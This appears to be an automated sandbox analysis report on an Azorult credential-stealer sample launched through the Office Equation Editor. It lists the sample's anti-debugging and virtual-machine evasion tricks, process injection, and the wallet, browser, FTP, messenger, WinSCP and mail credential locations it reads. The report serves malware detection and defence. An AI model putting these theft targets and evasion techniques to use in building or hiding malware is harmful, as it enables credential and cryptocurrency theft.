Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1ECFCF8\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2324 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2324 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe TID: 2296 Thread sleep time: -1260000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe TID: 2812 Thread sleep count: 126 > 30 Jump to behavior
Source: hfoewnmm.exe, 00000004.00000002.2090923974.0000000000320000.00000040.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
Source: hfoewnmm.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032021B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00322C9A,6DDB9555,? 4_2_0032021B
Hides threads from debuggers
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032003B rdtsc 4_2_0032003B
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321CE2 LdrInitializeThunk, 4_2_00321CE2
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00322C73 mov eax, dword ptr fs:[00000030h] 4_2_00322C73
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321046 mov eax, dword ptr fs:[00000030h] 4_2_00321046
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00320CE5 mov eax, dword ptr fs:[00000030h] 4_2_00320CE5
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032197F mov eax, dword ptr fs:[00000030h] 4_2_0032197F
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321189 mov eax, dword ptr fs:[00000030h] 4_2_00321189
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032118C mov eax, dword ptr fs:[00000030h] 4_2_0032118C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00322F1B mov eax, dword ptr fs:[00000030h] 4_2_00322F1B
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003233E0 mov eax, dword ptr fs:[00000030h] 4_2_003233E0
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003233EC mov eax, dword ptr fs:[00000030h] 4_2_003233EC

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Azorult
Source: Yara match File source: 00000005.00000003.2136713205.000000001FC44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hfoewnmm.exe PID: 2628, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %appdata%\Electrum\wallets\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %appdata%\Electrum\wallets\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: hfoewnmm.exe, 00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets\
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX Jump to behavior